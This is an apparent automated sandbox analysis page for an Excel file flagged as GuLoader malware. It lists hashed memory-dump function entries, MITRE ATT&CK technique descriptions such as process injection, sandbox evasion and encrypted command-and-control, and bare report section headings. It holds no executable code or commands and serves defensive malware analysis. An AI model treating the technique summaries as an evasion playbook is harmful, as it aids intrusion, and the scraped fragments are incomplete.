Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b95e6ca7c0cd9cfb7071aa5c2daa2dd236ffff7edbf45633bdc181b0cee99a5
Instruction ID: 1e975462cf8208a657ede89eed9c6f2b4ea5f5de0e95997fc8749b06585af770
Opcode Fuzzy Hash: 0b95e6ca7c0cd9cfb7071aa5c2daa2dd236ffff7edbf45633bdc181b0cee99a5
Instruction Fuzzy Hash: E371E571A006888FDB7ACE78C9947CA37A3AFD9314F51822ACD0DDBA54D330DA458B51

Uniqueness

Uniqueness Score: -1.00%

Function 003B1900, Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 0c107451566f3ff61c323fdbdaf3384779d14198e563c0770428e7b98185fe6b
Instruction ID: 9c067288243e1e7b4dff1b5433244a8b0a72eb05901d0e0df436c408b387bbfb
Opcode Fuzzy Hash: 0c107451566f3ff61c323fdbdaf3384779d14198e563c0770428e7b98185fe6b
Instruction Fuzzy Hash: 836138312087C69BD7279F3CCCA97EABFA1AF46324F89429DD8898B693C3701545C751

Uniqueness

Uniqueness Score: -1.00%

Function 003B95C6, Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8d4f69e530b87711bdc2af47ed320e619497e4c8738294dbf5fc24864a64ccb
Instruction ID: 1ac4995f561979facfac1802d9217a650ffb10c0a239c432e405e8546f9142f6
Opcode Fuzzy Hash: c8d4f69e530b87711bdc2af47ed320e619497e4c8738294dbf5fc24864a64ccb
Instruction Fuzzy Hash: 2061D371A006848FDB3ACE64C9947CA77A3BFD9314F55C22ACD0DDBA58D330DA458B91

Uniqueness

Uniqueness Score: -1.00%

Function 003B3441, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73f44942bab911701621c5b2707fe8b231395bcd8d7302cea63d41ddbb78e1ed
Instruction ID: da575f44b15f3a6aae079783e785cde4ed7cee8bd78820d7a93a81ab4dc7b257
Opcode Fuzzy Hash: 73f44942bab911701621c5b2707fe8b231395bcd8d7302cea63d41ddbb78e1ed
Instruction Fuzzy Hash: F151B9B1A002689FDB25DF28CC81BEA73E5FF49314F55412AED88CB711DB30AE458B81

Uniqueness

Uniqueness Score: -1.00%

Function 003B1DA0, Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20cd7f838c2c399771881acf17bb095032327195a07410a6ddac533b149d07e7
Instruction ID: b1c9e87868b4d668d71f79544037b4de97911a6d4a4129a317b69e06fdf79aec
Opcode Fuzzy Hash: 20cd7f838c2c399771881acf17bb095032327195a07410a6ddac533b149d07e7
Instruction Fuzzy Hash: 5D51CB76A04298AFCB34CE29CC55BDE77E6AF98340F46412AED4CEB610D7705E41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 003B1E99, Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d903e196d1a77e06caa362852e834474d1722d8d3cf3bcd7d1eda1d757427391
Instruction ID: 8533ef6db6893d26a80f9cb903b4d2a330a97c55480a55090ee7beabedacd00c
Opcode Fuzzy Hash: d903e196d1a77e06caa362852e834474d1722d8d3cf3bcd7d1eda1d757427391
Instruction Fuzzy Hash: F751FF76A04298AFCB34CE29CC15BDE77E6AF98310F46412AED4CEB610D3701E45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 003B40B7, Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1944b071c0b9ad6cb29e36e68911162b2672ce53d925434ae825b0b95ede70a
Instruction ID: 936b650a2a765567f494d199aaff9cd754449245b1af1fe90915aeea6baa19a0
Opcode Fuzzy Hash: c1944b071c0b9ad6cb29e36e68911162b2672ce53d925434ae825b0b95ede70a
Instruction Fuzzy Hash: 3B51F936601344DFE731CE6ACAA57DB77F3AF98300F9A852ACD4D4BA05C334AA018715

Uniqueness

Uniqueness Score: -1.00%

Function 003B2A77, Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95d92cf37e4b4cedc3369a403a8af7f8beef7af3960c28c153781cde82822bc7
Instruction ID: 98a028698a4579928a101b1420b819b1c8637de919e5594831b88db7b7b8ede7
Opcode Fuzzy Hash: 95d92cf37e4b4cedc3369a403a8af7f8beef7af3960c28c153781cde82822bc7
Instruction Fuzzy Hash: 46416832508388AFDB35DE75DC553EFBBA5EFA5314F56001EE9898B602C6305A81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 003B891F, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fb7e58d247ccaddce3f004ea839c770cbd46380bf4da2c5f9c979d04a7e12f1
Instruction ID: 91328ac35212e758a214863b332b6915ad969b9fe0721ec012c9fd1182e7c4ed
Opcode Fuzzy Hash: 6fb7e58d247ccaddce3f004ea839c770cbd46380bf4da2c5f9c979d04a7e12f1
Instruction Fuzzy Hash: 3F51F7729083848BDF79CF38C8983EBBBE1AF56354F49816ACC899F249D7348545C726

Uniqueness

Uniqueness Score: -1.00%

Function 003B3BFF, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d0d8cb8f45b45677d85e202ebf3f7ed91970e8ea84fe42c1372b25850ee9ab4
Instruction ID: 1ab6a19ccd9ac1a42591b10e3d26beb3b2ee25e5fc5af9ec4c4386f27f69f441
Opcode Fuzzy Hash: 3d0d8cb8f45b45677d85e202ebf3f7ed91970e8ea84fe42c1372b25850ee9ab4
Instruction Fuzzy Hash: DD41F135A04389DFDF759F39DC897DA77A1EF88320F81402AED88EB645C3308A418A46

Uniqueness

Uniqueness Score: -1.00%

Function 003B8C2C, Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3979e021ec42b1eab24740f0a9b7472aaf688e5640a37c2dbd419da152df4932
Instruction ID: 0e92ca8da103266790e2a73c3be6786841ba99744cc6f5c7201adda25f6c816e
Opcode Fuzzy Hash: 3979e021ec42b1eab24740f0a9b7472aaf688e5640a37c2dbd419da152df4932
Instruction Fuzzy Hash: 5C418B31D043848BDF32CF3889A93EB7B96AF42344F06812ECD868BA45D7704A46C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 003B4339, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e164ed57c3a3467471cb07b325d6d9deadb749a7e2ffbcf7627c77b8cd98c899
Instruction ID: cfd0d2dae396cd71845bee359025973029f2969b1847c60ac5773a22fc059549
Opcode Fuzzy Hash: e164ed57c3a3467471cb07b325d6d9deadb749a7e2ffbcf7627c77b8cd98c899
Instruction Fuzzy Hash: 1401AD3A8093109FC70C6F708A16AAABBE4BF12308F87482DDDC2A2821D33059C5CF43

Uniqueness

Uniqueness Score: -1.00%

Function 003B7898, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddaf7c65e72ce01bd5ce92f6025a78758458cf09adf806ed9f545b7f8277c1d1
Instruction ID: e98e4bc4ce025e720c0d5e766935c5973ecb24b66a7132d82a79e43b271e6a31
Opcode Fuzzy Hash: ddaf7c65e72ce01bd5ce92f6025a78758458cf09adf806ed9f545b7f8277c1d1
Instruction Fuzzy Hash: C40116B1A452888FDB72CF28C888BD973E0FB58304F058466EA19DBB11C3309E00CB10

Uniqueness

Uniqueness Score: -1.00%

Function 003B5589, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d623111d86762eb24377d814acc21f671ddf9c63aa473290ef7768a21f1cdae2
Instruction ID: c3c0329933c535c8ab8d9fbdceddaae54231673f2d0a871587ee904072db9e9d
Opcode Fuzzy Hash: d623111d86762eb24377d814acc21f671ddf9c63aa473290ef7768a21f1cdae2
Instruction Fuzzy Hash: 4CC092FA2026C09FFF0ADB08C491B4073A0FB44B88B0804D0E402CFB12C324E900CA08

Uniqueness

Uniqueness Score: -1.00%

Function 003B73B4, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Exhibitions Order Detailed list.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 2696 Parent PID: 584

General

Function 00401144, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
COMMON